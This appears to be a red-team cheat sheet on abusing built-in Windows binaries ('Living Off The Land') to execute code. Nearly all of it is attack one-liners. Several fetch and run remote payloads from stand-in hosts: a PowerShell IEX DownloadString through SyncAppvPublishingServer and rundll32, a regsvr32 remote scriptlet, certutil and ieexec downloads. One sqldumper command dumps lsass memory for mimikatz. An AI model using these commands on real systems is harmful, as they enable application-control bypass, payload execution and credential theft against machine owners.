Native Binary Tricks

Native Binary Tricks¶

Living Off The Land Binaries, Scripts and Libraries

forfiles¶

forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe

bash.exe¶

bash.exe -c calc.exe

scriptrunner.exe¶

scriptrunner.exe -appvscript calc.exe

SyncAppvPublishingServer.exe¶

SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('[http://some.url/script.ps1'](http://some.url/script.ps1')) | IEX

hh.exe¶

hh.exe [http://www.google.com](http://www.google.com) or hh.exe c:\\

certutil.exe¶

certutil -Class scrobj.dll
certutil -Class [http://WScript.Shell](http://WScript.Shell)
certutil -urlcache -split -f [http://example.com/file](http://example.com/file) 
certutil.exe -URL will fetch ANY file and download it here: %userprofile%\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content

rundll32.exe¶

rundll32.exe javascript:"..\\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('[http://ip:port/'](http://ip:port/'));"

regsvr32.exe¶

regsvr32 /s /n /u /i:[http://example.com/file.sct](http://example.com/file.sct) scrobj.dll

msbuild.exe¶

msbuild.exe pshell.xml

regsvcs.exe¶

regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll

regasm.exe¶

regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll

bginfo.exe¶

bginfo.exe bginfo.bgi /popup /nolicprompt

InstallUtil.exe¶

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

ieexec.exe¶

ieexec.exe [http://x.x.x.x:8080/bypass.exe](http://x.x.x.x:8080/bypass.exe)

msxsl.exe¶

msxsl.exe customers.xml script.xsl

odbcconf.exe¶

odbcconf.exe /f my.rsp

sqldumper.exe¶

sqldumper.exe 464 0 0x0110:40  - Dump lsass to mimikatz comp. dump

Source

sqldumper.exe 540 0 0x01100

https://twitter.com/countuponsec/status/910969424215232518

pcalua.exe¶

pcalua.exe-a c:\\datafolder\\tester.bat
pcalua.exe -a \\\\server\\payload.dll
pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl -c Java